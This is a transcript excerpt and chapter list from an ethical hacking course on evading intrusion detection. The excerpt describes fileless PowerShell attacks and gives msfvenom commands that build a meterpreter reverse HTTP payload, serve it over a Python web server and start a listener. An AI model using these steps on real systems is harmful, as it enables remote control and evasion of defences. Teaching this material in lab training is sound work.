From the course: Ethical Hacking: Evading IDS, Firewalls, and Honeypots
Fileless attacks with PowerShell
- [Instructor] Fileless malware is the term used to describe an attack technique that runs without writing any malware to disk. By doing this, it avoids the risk of being detected by a file scan. PowerShell can be used to execute scripts directly in memory and is a popular choice for fileless attacks. An example of this is the PowerShell download string method, which downloads content from a remote location to a buffer in memory. First of all, let's create a PowerShell script payload. msfvenom -p windows/x64/meterpreter_reverse_http and we'll make it PSH format. We'll set LHOST=10.0.2.12 for our IP address. LPORT=80 for HTTP and we'll output the file to m64.ps1 as a PowerScript shell. Okay, we now need to serve this on a website. So let's use our Python simple HTTP server. python -m SimpleHTTPServer. Now we need to set up a meterpreter listener for PowerShell. So in our second terminal, we'll run sudo msfconsole,…
Contents
- Evading antivirus detection (1m 24s)
- Exotic scanning with Nmap (4m 36s)
- Obfuscating payloads with msfvenom (2m 9s)
- Hiding payloads in benign files (4m 34s)
- Custom packaging of software (1m 2s)
- Fileless attacks with PowerShell (4m 38s)
- Hiding with the cloak of invisibility (1m 42s)
- Embedding malware in an alternate data stream (4m 6s)
- Tunneling through DNS with iodine (2m 44s)
- Checking for oversight (1m 21s)